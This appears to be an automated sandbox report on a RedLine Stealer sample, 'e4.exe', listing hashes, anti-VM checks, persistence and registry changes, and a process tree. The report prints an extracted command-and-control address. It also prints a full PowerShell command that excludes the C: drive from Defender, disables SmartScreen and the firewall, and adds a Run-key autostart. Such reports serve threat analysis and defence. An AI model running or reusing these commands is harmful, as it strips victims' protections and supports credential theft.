Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
04-08-2022 11:37
Behavioral task
behavioral1
Sample
e4.exe
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
e4.exe
Resource
win10v2004-20220721-en
General
-
Target
e4.exe
-
Size
4.5MB
-
MD5
5c371f2d51427f39d793c6df8487346c
-
SHA1
8bbc4272d6e36abf84a0d4fac47d49b690bfacdf
-
SHA256
e42c63f0af341c2271346774a69bdbceed9cc21f041680bc00e8e0d137340b48
-
SHA512
2f0d208bb52a44a085a9aa32169ba75ae3b5de2a552b2196532e59527eb7a0deb16fd87cc7363d7ec82627fdaba4ecf227bf2dd6da6331202a976a07c723ca34
Malware Config
Extracted
redline
1488
46.21.250.111:65367
-
auth_value
e1f55d6c61f97af563fc8c06a2c97666
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4356-134-0x00000000003F0000-0x0000000000EC2000-memory.dmp family_redline behavioral2/memory/4356-135-0x00000000003F0000-0x0000000000EC2000-memory.dmp family_redline behavioral2/memory/4356-153-0x00000000003F0000-0x0000000000EC2000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 2856 created 4992 2856 svchost.exe UpSys.exe PID 2856 created 4312 2856 svchost.exe UpSys.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
e4.exeTextOutputHost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TextOutputHost.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
TextOutputHost.exeUpSys.exeUpSys.exeUpSys.exepid process 2264 TextOutputHost.exe 4992 UpSys.exe 4312 UpSys.exe 4176 UpSys.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
TextOutputHost.exee4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TextOutputHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TextOutputHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
TextOutputHost.exee4.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation TextOutputHost.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation e4.exe -
Drops startup file 1 IoCs
Processes:
TextOutputHost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk TextOutputHost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/4356-134-0x00000000003F0000-0x0000000000EC2000-memory.dmp themida behavioral2/memory/4356-135-0x00000000003F0000-0x0000000000EC2000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe themida behavioral2/memory/4356-153-0x00000000003F0000-0x0000000000EC2000-memory.dmp themida behavioral2/memory/2264-154-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp themida behavioral2/memory/2264-156-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp themida behavioral2/memory/2264-157-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp themida behavioral2/memory/2264-159-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp themida C:\ProgramData\MicrosoftNetwork\System.exe themida behavioral2/memory/2264-177-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
e4.exeTextOutputHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA e4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TextOutputHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
e4.exeTextOutputHost.exepid process 4356 e4.exe 2264 TextOutputHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 51 IoCs
Processes:
powershell.exeUpSys.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e4.exepowershell.exeTextOutputHost.exeUpSys.exeUpSys.exepowershell.exepid process 4356 e4.exe 4396 powershell.exe 4396 powershell.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 4992 UpSys.exe 4992 UpSys.exe 4992 UpSys.exe 4992 UpSys.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 4312 UpSys.exe 4312 UpSys.exe 4312 UpSys.exe 4312 UpSys.exe 4788 powershell.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 4788 powershell.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe 2264 TextOutputHost.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
e4.exepowershell.exeUpSys.exesvchost.exeUpSys.exepowershell.exedescription pid process Token: SeDebugPrivilege 4356 e4.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 4992 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 4992 UpSys.exe Token: SeIncreaseQuotaPrivilege 4992 UpSys.exe Token: 0 4992 UpSys.exe Token: SeTcbPrivilege 2856 svchost.exe Token: SeTcbPrivilege 2856 svchost.exe Token: SeDebugPrivilege 4312 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 4312 UpSys.exe Token: SeIncreaseQuotaPrivilege 4312 UpSys.exe Token: SeBackupPrivilege 4396 powershell.exe Token: SeBackupPrivilege 4396 powershell.exe Token: SeRestorePrivilege 4396 powershell.exe Token: SeSecurityPrivilege 4396 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
e4.exeTextOutputHost.exepowershell.exesvchost.exeUpSys.exedescription pid process target process PID 4356 wrote to memory of 2264 4356 e4.exe TextOutputHost.exe PID 4356 wrote to memory of 2264 4356 e4.exe TextOutputHost.exe PID 2264 wrote to memory of 4396 2264 TextOutputHost.exe powershell.exe PID 2264 wrote to memory of 4396 2264 TextOutputHost.exe powershell.exe PID 4396 wrote to memory of 4992 4396 powershell.exe UpSys.exe PID 4396 wrote to memory of 4992 4396 powershell.exe UpSys.exe PID 4396 wrote to memory of 1112 4396 powershell.exe netsh.exe PID 4396 wrote to memory of 1112 4396 powershell.exe netsh.exe PID 2856 wrote to memory of 4312 2856 svchost.exe UpSys.exe PID 2856 wrote to memory of 4312 2856 svchost.exe UpSys.exe PID 2856 wrote to memory of 4176 2856 svchost.exe UpSys.exe PID 2856 wrote to memory of 4176 2856 svchost.exe UpSys.exe PID 4176 wrote to memory of 4788 4176 UpSys.exe powershell.exe PID 4176 wrote to memory of 4788 4176 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4.exe"C:\Users\Admin\AppData\Local\Temp\e4.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)3⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\MicrosoftNetwork\System.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
memory/1112-166-0x0000000000000000-mapping.dmp
-
memory/2264-156-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmpFilesize
9.3MB
-
memory/2264-159-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmpFilesize
9.3MB
-
memory/2264-178-0x00007FFC7AD30000-0x00007FFC7AF25000-memory.dmpFilesize
2.0MB
-
memory/2264-177-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmpFilesize
9.3MB
-
memory/2264-158-0x00007FFC7AD30000-0x00007FFC7AF25000-memory.dmpFilesize
2.0MB
-
memory/2264-157-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmpFilesize
9.3MB
-
memory/2264-154-0x00007FF6C8E80000-0x00007FF6C97D8000-memory.dmpFilesize
9.3MB
-
memory/2264-150-0x0000000000000000-mapping.dmp
-
memory/4176-169-0x0000000000000000-mapping.dmp
-
memory/4312-167-0x0000000000000000-mapping.dmp
-
memory/4356-137-0x0000000005A90000-0x0000000005AA2000-memory.dmpFilesize
72KB
-
memory/4356-139-0x0000000005AF0000-0x0000000005B2C000-memory.dmpFilesize
240KB
-
memory/4356-148-0x00000000077F0000-0x00000000079B2000-memory.dmpFilesize
1.8MB
-
memory/4356-153-0x00000000003F0000-0x0000000000EC2000-memory.dmpFilesize
10.8MB
-
memory/4356-146-0x0000000006C10000-0x0000000006C76000-memory.dmpFilesize
408KB
-
memory/4356-155-0x0000000077490000-0x0000000077633000-memory.dmpFilesize
1.6MB
-
memory/4356-130-0x00000000003F0000-0x0000000000EC2000-memory.dmpFilesize
10.8MB
-
memory/4356-145-0x0000000005950000-0x000000000596E000-memory.dmpFilesize
120KB
-
memory/4356-144-0x0000000006D20000-0x00000000072C4000-memory.dmpFilesize
5.6MB
-
memory/4356-141-0x0000000077490000-0x0000000077633000-memory.dmpFilesize
1.6MB
-
memory/4356-142-0x0000000001710000-0x0000000001786000-memory.dmpFilesize
472KB
-
memory/4356-143-0x00000000058B0000-0x0000000005942000-memory.dmpFilesize
584KB
-
memory/4356-138-0x0000000005BC0000-0x0000000005CCA000-memory.dmpFilesize
1.0MB
-
memory/4356-133-0x0000000077490000-0x0000000077633000-memory.dmpFilesize
1.6MB
-
memory/4356-134-0x00000000003F0000-0x0000000000EC2000-memory.dmpFilesize
10.8MB
-
memory/4356-140-0x00000000003F0000-0x0000000000EC2000-memory.dmpFilesize
10.8MB
-
memory/4356-136-0x0000000006010000-0x0000000006628000-memory.dmpFilesize
6.1MB
-
memory/4356-147-0x00000000074D0000-0x0000000007520000-memory.dmpFilesize
320KB
-
memory/4356-135-0x00000000003F0000-0x0000000000EC2000-memory.dmpFilesize
10.8MB
-
memory/4356-149-0x0000000008080000-0x00000000085AC000-memory.dmpFilesize
5.2MB
-
memory/4396-173-0x00007FFC5BF20000-0x00007FFC5C9E1000-memory.dmpFilesize
10.8MB
-
memory/4396-161-0x00000211EBF10000-0x00000211EBF32000-memory.dmpFilesize
136KB
-
memory/4396-160-0x0000000000000000-mapping.dmp
-
memory/4396-165-0x00007FFC5BF20000-0x00007FFC5C9E1000-memory.dmpFilesize
10.8MB
-
memory/4788-179-0x00007FFC5BF20000-0x00007FFC5C9E1000-memory.dmpFilesize
10.8MB
-
memory/4788-171-0x0000000000000000-mapping.dmp
-
memory/4788-174-0x00007FFC5BF20000-0x00007FFC5C9E1000-memory.dmpFilesize
10.8MB
-
memory/4788-175-0x000001D8E3C50000-0x000001D8E3C94000-memory.dmpFilesize
272KB
-
memory/4788-176-0x000001D8E3D20000-0x000001D8E3D96000-memory.dmpFilesize
472KB
-
memory/4992-163-0x0000000000000000-mapping.dmp